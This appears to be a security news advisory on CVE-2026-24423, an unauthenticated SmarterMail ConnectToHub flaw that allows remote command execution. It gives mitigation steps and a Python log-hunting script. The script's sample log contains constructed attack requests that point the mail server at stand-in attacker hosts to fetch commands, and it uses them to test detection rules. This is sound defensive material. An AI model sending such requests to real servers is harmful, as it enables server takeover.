theinfosecnews

CVE-2026-24423

CISA KEV

Published February 5, 2026 · Updated April 3, 2026

Severity: high

What This Means

CVE-2026-24423 — SmarterMail ConnectToHub API Authentication Bypass

The ConnectToHub API method in SmarterTools SmarterMail can be called without any authentication. An unauthenticated attacker can use it to point the mail server at an attacker-controlled HTTP server; that server supplies an OS command which SmarterMail then executes, giving the attacker code execution on the mail server without credentials or user interaction. Patch SmarterMail immediately, restrict network access to the SmarterMail administrative and API endpoints so that only trusted hosts can reach them, and audit logs for ConnectToHub requests from unexpected sources, hub connections to unknown hosts, and unexpected command execution by the mail server process.

Official Description

SmarterTools SmarterMail contains a missing authentication for critical function vulnerability in the ConnectToHub API method. This could allow the attacker to point the SmarterMail instance to a malicious HTTP server which serves the malicious OS command and could lead to command execution.

Affected Products

Vendor: SmarterTools
Product: SmarterMail

Patch Status

Patch by 2026-02-26

Recommended Actions

  1. Inventory your SmarterMail instances and record which of them are reachable from untrusted networks.
  2. Apply the vendor patch for CVE-2026-24423 immediately if available.
  3. This vulnerability is in CISA's Known Exploited Vulnerabilities catalog with a patch deadline of 2026-02-26; prioritize remediation accordingly.
  4. Until patched, limit network access to the SmarterMail API and administrative interface to trusted hosts, and monitor vendor advisories for updates and additional mitigations.
  5. Review web-server and SmarterMail logs for ConnectToHub requests from unexpected sources or without an authenticated user, hub connections to hosts you do not recognize, and unexpected processes spawned by the mail server.
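The log review in step 5 can be scripted. The following is an added example, not code or log output from SmarterMail or from this page: it runs a hunt over a few constructed access-log lines in a generic combined-style layout and flags every ConnectToHub request that has no authenticated user, originates outside an assumed management network, or names a hub host that is not on an assumed allowlist. The request path (`/api/v1/settings/ConnectToHub`), the `hub` query parameter, the management network and the allowlist are all assumptions made for the example; substitute your own log format and environment.

```python
"""Hunt for suspicious ConnectToHub calls in access logs (added example).

The log layout is a generic combined-style access log. The request path, the
``hub`` query parameter, the management network and the hub allowlist are all
assumptions for this example and are not taken from SmarterMail itself.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines; not real SmarterMail output.
SAMPLE_LOG = """\
10.0.5.21 - admin [05/Feb/2026:09:12:01 +0000] "POST /api/v1/settings/ConnectToHub?hub=https%3A%2F%2Fhub.corp.example HTTP/1.1" 200 512
203.0.113.77 - - [05/Feb/2026:09:13:44 +0000] "POST /api/v1/settings/ConnectToHub?hub=http%3A%2F%2F198.51.100.9%3A8080%2Fpayload HTTP/1.1" 200 318
203.0.113.77 - - [05/Feb/2026:09:13:45 +0000] "GET /api/v1/settings/ConnectToHub?hub=http%3A%2F%2F198.51.100.9%3A8080%2Fpayload HTTP/1.1" 200 318
10.0.5.22 - - [05/Feb/2026:09:20:10 +0000] "GET /api/v1/mail/inbox HTTP/1.1" 200 9021
10.0.5.30 - svc-mail [05/Feb/2026:09:25:00 +0000] "POST /api/v1/settings/ConnectToHub?hub=http%3A%2F%2Fevil.example%2Fcmd HTTP/1.1" 200 300
"""

# Combined-style line: client, ident, user, [timestamp], "METHOD target proto", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Assumed environment: only these networks administer the server and only
# this host is a legitimate hub. Adjust to your own deployment.
MANAGEMENT_NETS = [ipaddress.ip_network("10.0.0.0/8")]
ALLOWED_HUB_HOSTS = {"hub.corp.example"}


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def hub_host(target):
    """Return the host named by the assumed ``hub`` query parameter, if any."""
    values = parse_qs(urlsplit(target).query).get("hub")
    if not values:
        return None
    return urlsplit(values[0]).hostname


def hunt(log_text, nets=MANAGEMENT_NETS, allowed=ALLOWED_HUB_HOSTS):
    """Return one finding per ConnectToHub request that looks suspicious."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        if "connecttohub" not in path.lower():
            continue
        reasons = []
        # "-" in the user field means the request carried no authenticated user.
        if rec["user"] == "-":
            reasons.append("no authenticated user")
        src = ipaddress.ip_address(rec["ip"])
        if not any(src in net for net in nets):
            reasons.append("source outside management network")
        host = hub_host(rec["target"])
        if host is None or host not in allowed:
            reasons.append("hub host not allowlisted")
        if reasons:
            findings.append({"source": rec["ip"], "user": rec["user"],
                             "hub": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(finding)
```

On the constructed sample this flags the two external, unauthenticated requests that point the server at 198.51.100.9 and the authenticated request that names an unknown hub host; the ordinary admin call to the allowlisted hub and the unrelated inbox request are left alone. Any hit whose hub host you do not recognize should be treated as possible exploitation and the host examined for command execution by the mail server process.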

Related Coverage


CVE-2026-24423: SmarterMail ConnectToHub API Exposes Servers to Unauthenticated Remote Code Execution

CVE-2026-24423 is a missing authentication vulnerability in the ConnectToHub API method of SmarterTools SmarterMail, allowing unauthenticated remote attackers to redirect the mail server to a malicious HTTP endpoint and execute arbitrary OS commands. Successful exploitation requires no credentials or user interaction and results in full server compromise. CISA has added the vulnerability to its Known Exploited Vulnerabilities catalog with a federal patch deadline of February 26, 2026.
